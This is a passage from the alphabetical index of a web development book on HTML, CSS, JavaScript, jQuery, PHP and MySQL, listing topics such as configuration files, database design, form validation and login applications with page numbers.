confidentiality of websites, 587 
configuration files 
Apache, 83-84 
editing, 82 
MySQL, 65, 84 
PHP, 83 

configure command, 27-28, 41, 
43-44 
configuring Apache, 32-33
configuring php.ini files
disabling functions and classes, 
637-638 

error display, changing, 639 
making changes outside of, 636 
overview, 635 

resource limits, changing, 639 
session parameters, changing, 637 
session timeout, changing, 636-637 
working with, 635 

connecting to MySQL server, 517-519 
connection verification, 459 
Console Panel, Firebug add-on, 267 
console.log, 268 
constants, 287-288 

__construct method, 410

constructor, writing, 409-410 
Contacts page, building, 651-653 
continue statements, 344-346 
Control Panel, XAMPP, 78-79, 85 
converting HTML special characters to 
entities, 432 

convertstate function, 538, 539 
cookies 

checking if enabled, 438-440 
overview, 438 

session parameters, changing, 637 
copy statement, 368 
copying 

files with PHP functions, 368-369 
objects, 420-421 
corrupt tables, replacing from 
backups, 471 

counting characters in text boxes, 
254-257 

CREATE DATABASE statement,

489-490 

CREATE privilege, 462 

CREATE TABLE statement, 491-493

CREATE USER statement, 465

Creative Commons, 150 

cross site scripting, 430 

crypt() function, 610


CSS (Cascading Style Sheets) 
advantages of, 122 
background colors, changing, 
147-150 

background images, adding, 150-154 

borders, 140-144 

classes, 131-134 

comments, 132 

external style sheets, 128-129 

font color, setting, 138-140 

font family, setting, 134-136 

font size, setting, 136-138 

footers, 163-167 

on forms, reviewing, 561-562 

general discussion, 11, 121-122 

headers, 163-167 

hiding elements, 161 

inline, 122-126 

internal style sheets, 126-128 
jQuery, changing with, 237-240 
limitations of, 122-123 
list styles, 144-147 
matching cases with HTML, 131 
overview, 121 

for registration pages, 597-598 
single-column layout, creating, 
155-158 
targeting styles 
background colors, changing, 
147-150 

groups of elements, 131-134 
individual elements, 130-131 
overview, 128-129 
selecting HTML elements, 130 
two-column layout, creating, 

159-162 

web form fields, aligning with, 
180-183 

CSS classes, 131-134 
CSV (comma-separated values) files 
converting to TSV files, 392-393 
creating, 391 
overview, 389-391 
reading, 391 
curly braces ({}), 208, 276-277, 278,
284, 285 

current statement, 303
currentVal variable, 256 

D 


d date format symbol, 308 
D date format symbol, 309 
dashed border style, 141 
data 

adding to databases, 498-502 
choosing for databases, 475-477 
transfer fees, by web-hosting 
companies, 17 
data types 
BIGINT, 483 
Boolean, 288, 295-296 
CHAR, 483 

character strings, 292-295 
DATE, 483 
DATETIME, 484 
DECIMAL, 483 
ENUM, 484 

floating-point numbers, 289-291 
INT, 483 

integer, 288, 289-291 
integers, 289-291 
MySQL, 481-484 
NULL, 288, 296 
numeric, 289-291 
object, 288 
overview, 288-289 
querying PHP, 289 
resource, 288 
SERIAL, 484 
TEXT, 483 
TIME, 483 
VARCHAR, 483 
database design 
choosing data for, 475-477 
documentation, 487-488 
organizing data, 477-480 
overview, 475 


relationships between tables, 
creating, 480-481 
sample, 484-487 
storing different types of data, 
481-484 
databases 

browsing data in, 502 
building, 489-493 
choosing data for, 475-477 
controlling access to, 459-462 
data, adding, 498-502 
organizing data, 477-480 
overview, 475, 497 
relationships between tables, 
creating, 480-481 
removing data from, 513-514 
retrieving data from, 502 
combining data from separate 
tables, 508-513 
overview, 502-503 
specific information, 503-504 
in specific orders, 505 
from specific rows, 505-508 
sample, 484-487 
storing different types of data, 
481-484 

structure of, 450, 494-495 
updating data in, 513 
user, for login applications, 589-591 
web services, returning data with, 
545-548 

writing designs, 487-488 
date data, storing, 482 
DATE data type, 483 
date format symbols, 308-309 
date() function, 308, 545
dates, 220, 307-310, 542-545 
DATETIME data type, 484 
db table, 463 

debugging with Firebug add-on, 
266-268 

DECIMAL data type, 483 
decimal list style, 144 
default filenames, 18 
default root account, 458
default time zones, setting, 307-308 
default values for drop-down boxes, 
175-176 

define statement, 287 
DELETE privilege, 462 
DELETE statement, 513 
deleting 

data in databases, 513-514 
databases, 490 

files with PHP functions, 368-369 
delimiters, 327 

Denial of Service (DoS) attacks, 433 
deprecated functions, 313 
designing databases 
choosing data for, 475-477 
documentation, 487-488 
organizing data, 477-480 
overview, 475 

relationships between tables, 
creating, 480-481 
sample, 484-487 
storing different types of data, 
481-484 

destroying objects, 423-424 

__destruct method, 423-424

detecting web browsers, 214-216 
Developer’s Tools CD, 43 
development environment 
configuring, 82-84 
testing, 79-82 
die statement, 385 
directives, 32, 84 
directories 

copying file into different, 368 

creating with PHP, 369-370 

include, 363 

listing files in, 370-372 

overview, 366 

PHP scripts, 81 

root, 366 

directory handles, 370 
directory listings, FTP, 380 
dirname function, 367 
disable-libxml option, PHP, 45 


disabling 

form fields, 257-259 
functions and classes, 637-638 
disc list style, 144 
disk space, provided by web-hosting
companies, 17 

display code, separating from logic 
code, 357-358 
display CSS property, 160 
display_errors directive, 639 
display_errors option, 428 
displaying PHP content on web pages, 
278-281 

displaying values in PHP variables 
with echo statements, 284-285 
knowing how long variables hold 
values, 286 
overview, 284 

with print statements, 284-285 
with print_r statements, 286 
with var_dump statements, 286-287 
DISTINCT keyword, 505, 508 
div CSS selector, 130 
<div> tag, 95, 96, 126, 127-128 
division, 197 
division (/) sign, 290 
.dll files, 74 

DMG files, installing MySQL on Macs 
from, 62-63 

DNS (Domain Name System), 9, 14 
doctypes, 90-91 
document object, 211, 214 
Document Object Model (DOM), 210, 
211-214 
Document Root 
changing location of, 32, 33 
location of, 51 

Document Type Declaration (DTD), 
90-91 

documents, HTML 
block-level elements, 98 
body section, 94 
comments, 101-102 
head section, 92-93 
images, adding, 113-116 
indentation in, 102
inline elements, 98 
inserting text, 95-96 
line breaks, inserting, 99-101 
links, adding, 108-112 
lists, adding, 102-105 
overview, 89-90, 91-92 
root element, 92 
spaces, inserting, 99-101 
tables, 102-103, 105-108 
title elements, 93 
types of, declaring, 90-91 
dollar amounts, formatting numbers 
as, 291 

dollar sign ($), 282, 283, 405 
DOM (Document Object Model), 210, 
211-214 

Domain Name System (DNS), 9, 14 
domain names, 9 
DOMDocument object, 551 
DoS (Denial of Service) attacks, 433 
dot (.), 294 
dot notation, 208, 209 
dotted border style, 141 
double border style, 141 
double quotes (" "), 285
double-quoted strings, 292-294 
do..while loops, 335, 341-342
downloaded files, verifying, 24-25, 
39, 59 

downloading 
Apache, from website, 23 
Firebug add-on, 265 
with FTP, 380-382 
jQuery, 220-221 
MySQL, 58 

PHP, from website, 37 
XAMPP installation kit, 75-76 
DROP privilege, 462, 490 
DROP TABLE statement, 493
DROP USER statement, 468
drop-down boxes, 170, 174-176, 431, 
579-580 

DTD (Document Type Declaration), 
90-91 


dynamic web applications 
MySQL, 12-13 
PHP, 12-13 

E 


E_ERROR keyword, 312 
each() loop, 230

echo statements, 275-276, 278-281, 
284-285, 287, 298 
ECMA-262 specification, 188 
e-commerce administration, 587 
editors, text, 89, 97, 311 
else section of if statements, 330 
elseif section of if statements, 330 
e-mail addresses 
PHP validation of, 581-582 
provided by web-hosting 
companies, 17 
e-mail functionality 
class methods, building, 628-632 
overview, 618-619 
password recovery page, building, 
619-622 

password reset database, 
building, 619 

password reset page, building, 
623-625 

process files, building, 625-628 
success page, building, 622-623, 625 
emailPass method, 628-630
em’s, font sizing by, 136-138 
enable-ftp option, PHP, 45 
enable-magic-quotes option, 

PHP, 45 
enabling 
FTP, 378 

panels in Firebug add-on, 267 
encoding, character, 119 
encryption of MySQL passwords, 461 
end statement, 303 
ending statements, in for loops, 338 
endingcondition statement, 336
ENDSTRING, 295 
Enterprise Server, 58
entities, database, 478 
ENUM data type, 484 
enumeration data, storing, 482-483 
equal operator (==), 421-422 
equal sign (=), 194, 282 
error display, changing PHP, 639 
error log, MySQL, 70 
error messages 
access denied, 69 
Can’t connect to ..., 70
client does not support 

authentication protocol, 69-70 
MySQL, 522-523 
SQLite software, 395 
undefined function, 53, 73 
web services, 547 
error messages, PHP, 301 
displaying, 313-315 
fatal errors, 312 
logging, 315-316 
notices, 313 

operating system commands, 
accessing with, 376-377 
overview, 310 
parse errors, 311 
strict messages, 313 
suppressing, 315 
types of, 310-311 
warnings, 312 
error_log option, 428 
error_reporting directive, 639 
errors, handling with Exception 
class, 419-420 
escaping from HTML, 272 
escaping special characters, 292, 
525-526 
events 

form, 242-247 

hover event handler, adding, 
251-254 

keyboard, 254-259
mouse click event handler, adding, 
247-251 
overview, 241 
types of, 241-242 


Exception class, handling errors 
with, 419-420 

exchanging PHP data with other 
programs, 389-391 
exclamation point (!), 332-333 
exec function, 372, 375-376 
exec-prefix=EPREFIX option,
PHP, 45 

expose_php option, 428 
expressions for where clause, 
506-507 

Extensible Markup Language (XML), 
541, 550-553 

extensions for MySQL support, 71 
external JavaScript files, 190 
external style sheets, 128-129 
extract function, 302 

F 


F date format symbol, 308 
F12 Developer Tools, 264 
fatal errors, 311, 312 
Fedora, 23, 37 

feedback to form users, providing, 
565-568 

feof function, 387 
fgets statement, 387, 388, 391 
fields on web forms 
aligning with CSS, 180-183 
malicious attacks through, 429-430 
<fieldset> tag, 172 
file extensions, PHP, 19 
file function, 389, 391 
file handles, 384 
file management with PHP 
copying files, 368-369 
deleting files, 368-369 
getting information about files, 366 
moving files, 368-369 
overview, 366 
file modes, 380 
FILE privilege, 462 
file system, 366 
File Transfer Protocol (FTP)
directory listings, 380 
downloading files with, 380-382 
functions, 382-383 
logging in to server, 379 
overview, 378 

safe uploading with, 434-436 
support for, enabling, 45 
uploading files with, 380-382 
file_exists statement, 366
file_get_contents function, 389
file_uploads setting, 433
fileatime function, 367
filectime function, 367
filegroup function, 367
filemtime function, 367
filename extensions, verifying, 434 
filenames 

changing in Apache, 33 
default, 18 

fileowner function, 367
files. See also File Transfer Protocol 
(FTP) 

accessing text files, with PHP, 

384-386 

Apache configuration, 83-84 
binary, 23, 37, 58, 380 
closing text, 386 
comma-delimited, 389-391, 500 
copying into different 
directories, 368 
copying with PHP functions, 

368-369 

CSV, 389-391, 392-393 
default filenames, 18 
deleting with PHP functions, 

368-369 
.dll, 74 

DMG, installing MySQL on Macs from, 
62-63 

downloaded, verifying, 24-25, 

39, 59 

editing configuration, 82 
external JavaScript, 190 
file extensions, PHP, 19 


file management with PHP 
copying files, 368-369 
deleting files, 368-369 
getting information about files, 366 
moving files, 368-369 
overview, 366 
file modes, 380 

filename extensions, verifying, 434 
flat, PHP statements for 
accessing files, 384-386 
exchanging data in, 390 
overview, 383-384 
reading from, 387-390 
SQLite software, 394-395 
writing to, 386-387 
formats for image, 115 
getting information about with PHP 
functions, 366 

.htaccess, setting PHP options 
in, 636 

httpd.conf, 32, 47, 83-84
include, 359 

installing MySQL from RPM files on 
Linux, 61-62 

listing in directories, 370-372 
modes for opening, 384 
moving with PHP functions, 

368-369
my.cnf, 84

MySQL configuration, 65, 84 
organizing with PHP functions, 

369-372

password recovery process, 
creating, 625-626 
PHP configuration, 83 

php.ini 

disabling functions and classes, 
637-638 

editing, 50-51, 53, 83 
error display, changing, 639 
file_uploads setting, 433
limiting file sizes in, 433 
location of, 83 

making changes outside of, 636 
overview, 635 
files (continued)

resource limits, changing, 639 
security options, setting in, 428 
session parameters, changing, 637 
session timeout, changing, 636-637 
troubleshooting PHP and MySQL 
connections, 73 
working with, 635 
prepended, starting sessions with, 
532-534 

preventing uploads to PHP, 433 
process files, building, 625-628 
reading into arrays, 388-389 
reset process, creating, 627-628 
specifying log files, 316 
tab-delimited, 391-393, 500 
test.php, 51-52
TSV, 391-393 

uploading with FTP, 434-436 
validating, 433-434 
verifying downloaded, 24-25 
Zip, 37, 46 

filesize function, 367 
filetype function, 367
filter_var() function, 581-582, 585
filtering jQuery selectors, 227 
final keyword, 418
Firebug add-on 
debugging with, 266-268 
installing, 264-266 
overview, 264 
Firebug console, 266 
Firefox web browser, 264-268 
firewalls, 426 

flat files, PHP statements for 
accessing files, 384-386 
exchanging data in, 390 
overview, 383-384 
reading from, 387-390 
SQLite software, 394-395 
writing to, 386-387 
float CSS property, 160 
floating-point numbers, 288, 289-291 
FLUSH PRIVILEGES statement, 466
folders, 366 

font family, setting, 134-136 


font sizing methods, 136-137 
font-family property, 134-135 
fonts, styling with CSS 
color, setting, 138-140 
font family, setting, 134-136 
general discussion, 122-126 
overview, 11, 134 
size, setting, 136-138 
font-size CSS property, 136-137 
font-style property, 126 
font-weight property, 126 
fopen() function, 434
fopen statement, 385
for loops 
advanced, 337-339 
building, 336 

general discussion, 200-203 
nesting, 336-337 
overview, 335 

foreach statement, 304-305, 306
form events, 241, 242-247 
<form> tag, 95, 170, 172-173 
form validation. See also PHP 
validation 

adding to web form, 563-565, 
570-574 
basic, 557-561 
of check boxes, 579-580 
of drop-downs, 579-580 
e-mail addresses, 581-582 
feedback to form users, 565-568 
form validation process, 555-556 
HTML, 116-119 

HTML and CSS on forms, reviewing, 
561-562 

matching passwords, 582-584 
of numbers, 580-581 
overview, 555, 574-576 
of radio buttons, 579-580 
refining, 568-570 
of required fields, 576-579 
of text, 579 
of URLs, 582 

validation functions, creating, 
585-586 

of web forms, 246-247 
format symbols for dates, 308-309
formats for image files, 115 
formatting 
dates, 308 

numbers as dollar amounts, 291 
forms. See also validation 
aligning fields with CSS, 180-183 
checkboxes, creating, 176-177 
clearing, 180 

counting characters in text boxes, 
254-257 

creating with OOP, 414-415 
disabling form fields, 257-259 
drop-down boxes, adding, 174-176 
<form> tag, 172-173 
general discussion, 169-170 
input elements of, 170-172 
malicious attacks through, 429-432 
overview, 169 
radio buttons, 178-179 
submitting, 179-180 
text inputs, adding, 173-174 
unexpected input, handling, 

429-432 

forward slash (/), 327 
front slash (/), 197 
FTP (File Transfer Protocol) 
directory listings, 380 
downloading files with, 380-382 
functions, 382-383 
logging in to server, 379 
overview, 378 

safe uploading with, 434-436 
support for, enabling, 45 
uploading files with, 380-382 
ftp_cdup function, 382
ftp_chdir function, 382
ftp_close function, 382, 436
ftp_connect function, 379, 382, 435
ftp_delete function, 382
ftp_exec function, 382
ftp_fget function, 382
ftp_fput function, 383
ftp_get function, 380, 383, 436
ftp_login function, 383, 435 


ftp_mdtm function, 383 
ftp_mkdir function, 383
ftp_nlist function, 380, 383
ftp_put function, 381, 383, 435
ftp_pwd function, 383
ftp_rename function, 383
ftp_rmdir function, 383
ftp_size function, 383
ftp_systype function, 383
function files, creating, 591-593 
function keyword, 204 
functions. See also specific functions by 
name 

accessing HTML with JavaScript, 211 
addNumbers, 205-207 
anonymous, 225 
arguments, adding, 204 
calling, 204-205 
creating, 204 
FTP, 382-383 
overview, 203-204 
returning results from, 207-208 
functions, PHP. See also specific 
functions by name 
built-in, 356 

code reuse through, 536-539 
creating, 347 
deprecated, 313 
disabling, 637-638 
error messages, 312 
file management, 365-369 
include files, placing in, 360 
for MySQL, 452 

organizing scripts with, 358-359 
overview, 319, 346 
passing values to, 349-354 
related to objects and classes, 
422-423 

returning values from, 354-356 
reusing code, 358 
for validation, 585-586 
variables, using in, 347-349 
for working with MySQL, 516 
functions, SQL, 504 
fwrite statement, 386 
G date format symbol, 309
g date format symbol, 309 
GET method, 172, 173, 548 
get_class_methods function, 422 
get_class_vars function, 422 
get_object_vars function, 423
_getDocType method, 645
getElementById function, 211-214
_getHead() method, 645
_getHtmlOpen() method, 645
getTop() method, 644, 648
global functions, 347 
global statement, 348-349 
Google, use of page titles, 93 
Google Maps, 188 
GRANT privilege, 462 
GRANT statements, 465, 466-467 
GRANT tables, 473 
GROUP BY, SELECT queries, 505 
grSecurity, 425 

H 


H date format symbol, 309 
h date format symbol, 309 
<h1> through <h6> tags, 95, 96
hardening servers, 425-426 
hash values, 438 
HashCheck, 39 

head section, HTML documents, 
92-93 

<head> section of page, 643 
Hello World script, 274 
helper functions, automatically 
including, 531-535 
auto_prepend_file function,
531-532 

classes, using for efficiency, 534-535 
overview, 531 

sessions, starting with prepended 
files, 532-534 
heredoc statement, 295 
hex codes, 137-138 


hiding elements with CSS, 161 
hinting, type, 406 
holding data 
in arrays, 195 
in variables, 193-195 
host table, 463 
hosting 

choosing hosts, 14-15 
for company websites, 15-16 
hosted websites, using, 18-19 
overview, 14 

web-hosting companies, choosing, 
16-18 

hostnames, 19, 460-461 
hover event handlers, 251-254 
hover() function, 253
<hr> tag, 95 
href attribute, 108 
htdocs directory, 81 
HTML (HyperText Markup Language) 
block-level elements, 98 
comments, 101-102 
converting special characters to 
entities, 432 
creating pages, 97-98 
CSS styling, adding to page elements, 
122-126 

CSS targeting of elements, 130 
documents, 89-94 
escaping from, 272 
on forms, reviewing, 561-562 
general discussion, 10-11 
images, adding, 113-116 
include files, placing in, 359 
inline elements, 98 
inserting text in pages, 95-96 
JavaScript, working with, 189-190, 
210-214 

jQuery, working with, 227-232 
line breaks, inserting, 99-101 
links, adding, 108-112 
lists, adding, 102-105 
output on web pages, 
troubleshooting, 53 
overview, 89 

PHP logic, separating from, 357-358 
semantic markup, 95
spaces, inserting, 99-101 
tables, 102-103, 105-108 
tags, 94-95, 103 
validating, 116-119 
HTML5 document type, 90 
htmlentities() function, 432
HTTP (HyperText Transfer Protocol), 
8-9, 548 

httpd.conf file, 32, 47, 83-84
HyperText Markup Language (HTML) 
block-level elements, 98 
comments, 101-102 
converting special characters to 
entities, 432 
creating pages, 97-98 
CSS styling, adding to page elements, 
122-126 

CSS targeting of elements, 130 
documents, 89-94 
escaping from, 272 
on forms, reviewing, 561-562 
general discussion, 10-11 
images, adding, 113-116 
include files, placing in, 359 
inline elements, 98 
inserting text in pages, 95-96 
JavaScript, working with, 189-190, 
210-214 

jQuery, working with, 227-232 
line breaks, inserting, 99-101 
links, adding, 108-112 
lists, adding, 102-105 
output on web pages, 
troubleshooting, 53 
overview, 89 

PHP logic, separating from, 357-358 
semantic markup, 95 
spaces, inserting, 99-101 
tables, 102-103, 105-108 
tags, 94-95, 103 
validating, 116-119 
HyperText Transfer Protocol (HTTP), 
8-9, 548 
i date format symbol, 309
i++ (postfix operator), 201 
icon, Firebug, 266
icons, used in book, 3 
id attribute, 177, 182 
id selector, 130-131 
identical operator (===), 421-422 
if statements 
building, 330-332 
complex statements, 277 
negating, 332-333 
nesting, 333 
overview, 329, 330 
IIS (Internet Information Services),
Microsoft, 8, 19, 25, 48-49, 273 
images 

adding to background, 150-154 
changing with jQuery, 234-237 
file size, 114 
formats, 115 

inserting in pages, 113-116 
<img> tag, 95, 113-114 
include files 

external text files, bringing into 
script, 360-361 

include directories, setting up, 363 
include statements, types of, 360 
overview, 359-360 
PHP tags in, 361 
secure storage for, 361-362 
variables, using in, 361 
include statements, types of, 360 
include_once statements, 360-361 
increment statement, 336
indentation 
in HTML, 102 
in PHP code, 277-278 
indexes, 203 
infinite loops 
avoiding, 343-344 
with while loops, 341 
infodir=DIR option, PHP, 45
inheritance, 400 
ini_get() function, 636
ini_set() function, 636
initUser function, 610 
inline CSS, 122-126 
inline elements, 98 
inner joins, 510
in-page anchors, 111
input data, accepting in web services, 
548-553 

input elements of, 170-172 
<input> tag, 95 
INSERT privilege, 462 
INSERT statement, 499, 602 
inserting 

line breaks, in pages, 99-101 
spaces, in pages, 99-101 
text in HTML pages, 95-96 
installation kit, XAMPP 
Control Panel, using, 78-79 
installing, 76-78 
obtaining, 75-76 
overview, 24, 38, 59, 75 
reinstalling, 84-85 
testing, 79-82 
troubleshooting, 85 
uninstalling, 84-85 
installation kits 
for Apache, 24 
for MySQL, 59 
for PHP, 38-39 
Installation Type screen, 26 
installing 
Apache, 25-28 
Firebug add-on, 264-266 
jQuery, 220-221 
MySQL, 20, 59-65 
PHP, 20, 40-46 

web servers, on local computers, 
19-20 

XAMPP installation kit, 76-78 
instanceof operator, 423 
instantiation, 398, 402, 413 
INT data type, 483 
integer data type, 288, 289-291 
interfaces, 417-418 


internal style sheets, 126-128 
Internet Explorer 
F12 Developer Tools, 264 
JavaScript support, 188 
Internet Information Services (IIS), 
Microsoft, 8, 19, 25, 48-49, 273 
Internet Protocol (IP) addresses 
general discussion, 9 
as hostnames, 460 
is_dir function, 367 
is_executable function, 367 
is_file function, 367
is_readable function, 367 
is_writable function, 367 
isLoggedIn property, 612-613, 
614-618 

isNaN() function, 206
iteration 

with foreach statement, 304-305 
manual, 303-304 
multidimensional arrays, 306 
overview, 302-303 

J

j date format symbol, 308 
Java, 12, 187-188 
JavaScript. See also jQuery 
alerts, sending to screen, 191-193 
arrays, holding multiple values 
in, 195 

benefits of, 188 
comments, adding, 193 
conditionals, 197-200 
debugging with Firebug add-on, 
266-268 
events 

form, 242-247 

hover event handler, adding, 
251-254 

keyboard, 254-259 
mouse click event handler, adding, 
247-251 
overview, 241 
types of, 241-242 
external, 190
functions, 203-208 
general discussion, 11-12 
HTML, working with, 189-190, 
210-214 

Java versus, 187-188 
JavaScript tag, adding to 
pages, 189 

for login pages, 606-607 
looping, 200-203 
numbers, working with, 196-197 
objects, 208-210 
overview, 187, 191 
password recovery pages, building, 
621-622 

for registration pages, 596-597 
strings, keeping track of words with, 
195-196 

troubleshooting 
alerts, 191-193, 262 
comments, 262-264 
Firebug add-on, 264-268 
overview, 261 
validation 

adding to web form, 563-565, 
570-574 
basic, 557-561 

feedback to form users, 565-568 
HTML and CSS on forms, reviewing, 
561-562 
overview, 556 
refining, 568-570 

variables, holding data in, 193-195 
web browsers, working with, 

214-217 

JavaScript Object Notation (JSON), 
541, 542-545, 551-553 
JavaScript tag, adding to pages, 189 
JavaScript validation 
adding to web form, 563-565, 
570-574 
basic, 557-561 

feedback to form users, 565-568 
HTML and CSS on forms, reviewing, 
561-562 


overview, 556 
refining, 568-570 
JOIN query, 510-513 
joining multiple comparisons, 
327-329 

joining strings, 196, 294 
jQuery. See also events
CDN-hosted, adding to pages, 
222-223 

CSS, changing, 237-240 
general discussion, 219-220 
HTML, working with, 227-232 
HTML attributes, setting, 232-237 
installing, 220-221 
local, adding to pages, 221-222 
overview, 214, 219 
ready () function, 223-225 
selecting elements with, 225-227 
JSON (JavaScript Object Notation), 
541, 542-545, 551-553 
json_decode() PHP function,
544-545 

K 


keyboard events 

counting characters in text boxes, 
254-257 
overview, 241 

preventing character input, 257-259 
key/value pairs, 297 
keywords 

DISTINCT, 505, 508 
E_ERROR, 312 
final, 418 
function, 204 
LIMIT, 505, 508 
private, 404 
protected, 404 
public, 404 
return, 207 
var, 193-194 
krsort function, 301 
ksort function, 301 
l date format symbol, 309
<label> tag, 172 
language options, XAMPP web 
page, 80 

<legend> tag, 172 
length property, 202 
<li> tag, 103
LIMIT keyword, 505, 508
line breaks, inserting in pages, 
99-101 

line numbers in script, 311 
lines, separating in PHP code, 
280-281 

<link> tag, 95, 128-129
links 

absolute versus relative, 111
adding to page, 108-109 
opening in new windows, 112 
to other pages, creating, 109-110 
overview, 108 

within pages, creating, 111-112 
password recovery page, adding 
to, 621 
Linux 

activating MySQL support, 71-72 
Apache, installing on, 19 
backing up databases on, 469-471 
case sensitivity with SQL, 452 
checking for MySQL on, 56 
checking for PHP installation on, 36 
configuring Apache for PHP, 49 
controlling MySQL server, 67 
getting Apache information on, 31 
installing Apache from source code 
on, 27-28

installing MySQL from RPM files, 
61-62 

installing MySQL on, 20 
installing PHP on, 40-42, 44-45 
obtaining Apache for, 23-24 
obtaining MySQL for, 58-59 
obtaining PHP for, 37-38 
PHP, installing on, 20 


restarting Apache on, 30 
starting Apache on, 29-30 
starting MySQL on, 57 
stopping Apache on, 30 
text editors, 97 

troubleshooting PHP and MySQL 
connections, 73 
list function, 302 
lists 

creating in HTML, 102-105 
of directory files, creating, 370-372 
styles, 144-147 
list-style-type CSS 
properties, 144 
literal characters, 323-326 
LOAD DATA INFILE statement, 501
LOAD statement, 498-502 
local jQuery, adding to pages, 
221-222 

local time, setting, 307-308 
local variables, 347 
location object, 216-217 
location options, configure 
command, 43 

log out pages, building, 614-618 
log_errors option, 428 
logging in to FTP server, 379 
logging PHP error messages, 315-316 
logic code, separating from display
code, 357-358
login applications 
authenticated pages, adding, 
612-618 

e-mail functionality 
class methods, building, 628-632 
overview, 618-619 
password recovery page, building, 
619-622 

password reset database, 
building, 619 

password reset page, building, 
623-625 

process files, building, 625-628 
success page, building, 622-623, 625
function files, creating, 591-593
general discussion, 588 
login pages, building, 604-607 
overview, 587 

success pages, building, 602-604 
user database, creating, 589-591 
User objects, creating, 607-611 
web forms, creating, 593-602 
login names, 460 
login pages, 523-524, 604-607 
long strings, storing, 295 
loops 

breaking out of, 344-346 
do..while loops, 341-342
each() loops, 230
for, 200-203, 335-339 
infinite, avoiding, 343-344 
overview, 200, 319, 335 
while loops, 203, 338-341 

M 


M date format symbol, 308 
m date format symbol, 308 
Macs 

activating MySQL support, 71-72 
Apache, installing on, 19 
backing up databases on, 469-471 
checking for MySQL on, 56 
checking for PHP installation 
on, 36 

configuring Apache for PHP, 49 
controlling MySQL server, 67 
getting Apache information on, 31 
installing Apache on, 27-28 
installing MySQL from DMG files, 
62-63 

installing MySQL on, 20 
installing PHP on, 20, 42-45 
obtaining Apache for, 24 
obtaining MySQL for, 59 
obtaining PHP for, 38 
restarting Apache on, 30 
starting Apache on, 29-30 
stopping Apache on, 30 


text editors, 97 

troubleshooting PHP and MySQL 
connections, 73 
magic quotes feature, 525-526 
mail() function, 630
maintenance of PHP scripts, 357
make command, 28 
malicious attacks, 429-432, 433 
MAMP installation kit, 24, 39 
mandir=DIR option, PHP, 45 
manually shutting down MySQL 
server, 67 

manually traversing arrays, 303-304 
margin CSS property, 157, 158 
markup, semantic, 11, 95 
master class, 400 

mathematical operations on database 
columns, 503 

max_execution_time directive, 639 
maxCharacters variable, 256 
maxsize attribute, 173 
MD5 signatures, 39 
members-only websites 
authenticated pages, adding, 612-618

e-mail functionality 
class methods, building, 628-632 
overview, 618-619 
password recovery page, building, 
619-622 

password reset database, 
building, 619 

password reset page, building, 
623-625 

process files, building, 625-628 
success page, building, 622-623, 625

function files, creating, 591-593 
general discussion, 588 
login pages, building, 604-607 
overview, 587 

success pages, building, 602-604 
user database, creating, 589-591 
User objects, creating, 607-611 
web forms, creating, 593-602 
memory_limit directive, 639
meta elements, 93 
method attribute, 172 
methods. See also specific methods by 
name 

abstract, 415-418 
adding to classes, 405-407 
choosing for OOP scripts, 401-402 
class, building, 628-632 

__clone, 420-421
__construct, 410
constructor, writing, 409-410
__destruct, 423-424
emailPass, 628-630
GET, 172, 173, 548
_getDocType, 645
_getHead(), 645
_getHtmlOpen(), 645
getTop(), 644, 648
overview, 399-400 
POST, 172, 173, 548 
preventing changes to, 418 
private, 407-409, 632 
public, 407-409 
_resetPass, 632 
validateReset(), 630-631
mice 

click event handler, adding, 247-251 
hover event handler, adding, 
251-254 
overview, 241 

Microsoft Internet Information
Services (IIS), 8, 19, 25, 48-49, 273
Microsoft Virtual PC for Application 
Compatibility software, 122 
Microsoft Windows. See also XAMPP 
installation kit 

activating MySQL support, 71 
Apache, installing on, 19 
backing up databases on, 469 
checking for MySQL on, 56 
checking for PHP installation on, 36 
configuring web server for PHP, 
47-48 

controlling MySQL server, 66-67 
getting Apache information on, 31 


installing Apache on, 25-26 
installing MySQL on, 20 
installing PHP on, 20, 46 
MySQL Setup Wizard, running on, 
60-61 

obtaining Apache for, 23 
obtaining MySQL for, 58 
obtaining PHP for, 37 
starting and stopping Apache on, 
28-29 

starting MySQL on, 57 
text editors, 97 

troubleshooting PHP and MySQL 
connections, 73, 74 
minus sign (-), 197, 290 
mkdir function, 369-370 
mobile devices, 10 
mod_security, 427 
mod_so module, 40, 42 
modes for opening files, 384 
modulus (%) sign, 290
mouse events 

click event handler, adding, 247-251 
hover event handler, adding, 
251-254 
overview, 241 

moving files with PHP functions, 
368-369 

multidimensional arrays, 305-306 
multiline comments, 263
multiple comparisons, joining, 
327-329 

multiple inheritance, 400 
multiple_query function, 520
multiplication, 197 
multiplication (*) sign, 290 
my.cnf file, 84
MySQL 
accounts 
adding, 465 

administrator responsibilities 
regarding, 458 
attributes of, 459 
names of, 460-461 
overview, 455, 462, 464 
passwords, 461, 465-466 
privileges, 461-462, 466-467
removing, 467-468 
viewing information about, 464 
activating support for, 71-72 
administration program for, 70 
administrator responsibilities, 
457-458 

backing up databases, 468-471 
checking for installation of, 55-56 
communicating with, 450-454 
configuring, 65, 84 
controlling access to data, 459-462 
controlling server, 66-67 
database structure, 450 
default root account, 458 
downloading, 58 

errors, handling with PHP, 522-523 
function of, 449-450 
general discussion, 12-13 
installing, 20, 59-65 
location of databases, 19 
mysqli functions, 523-526 
mysqli functions, converting to 
mysql functions, 526-527 
obtaining, 57-59 
overview, 449, 457 
PHP communication with, 516-521 
PHP scripts, working with, 515-516 
protecting databases, 454-455 
provided by web-hosting 
companies, 16 
restoring data, 471-473 
running as service, 85 
selecting databases with PHP, 521 
server, connecting to, 517-519 
SQL statements, sending to 
server, 519 
starting, 56-57 
testing, 68-69 

troubleshooting connections with 
PHP, 73-74 

troubleshooting installation, 69-70 
upgrading, 473 

XAMPP Control Panel, starting and 
stopping with, 78-79 


mysql client, 68-69, 452, 453 
mysql database, 463, 464 
mysql extension, 71 
mysql functions 
converting mysqli functions to, 
526-527 
overview, 516 

selecting databases with, 521 
MySQL server, 449-450 
MySQL Setup Wizard, running on 
Windows, 60-61 

MySQL website, downloading software 
from, 58 

MySQL Workbench, 70 
mysql_select_db function, 521 
mysql_upgrade script, 473 
mysqladmin utility, 67 
mysqldump utility program, 469 
mysqli extension, 71 
mysqli functions 
converting to mysql functions, 
526-527 

error messages, handling, 522-523 
overview, 516 
types of, 523-526 
mysqli_affected_rows 
function, 525 

mysqli_connect function, 517-518 
mysqli_error function, 522-523 
mysqli_insert_id function, 524 
mysqli_num_rows function, 523-524 
mysqli_query() function, 522
mysqli_real_escape_string 
function, 526 

mysqli_real_escape_string()
function, 602

mysqli_select_db function, 521 
myVariable variable, 194 

N 


n date format symbol, 308 
name attribute, 112, 177, 178 
names of accounts, MySQL, 460-461 
naming

PHP constants, 288 
PHP functions, 359 
PHP variables, 282 
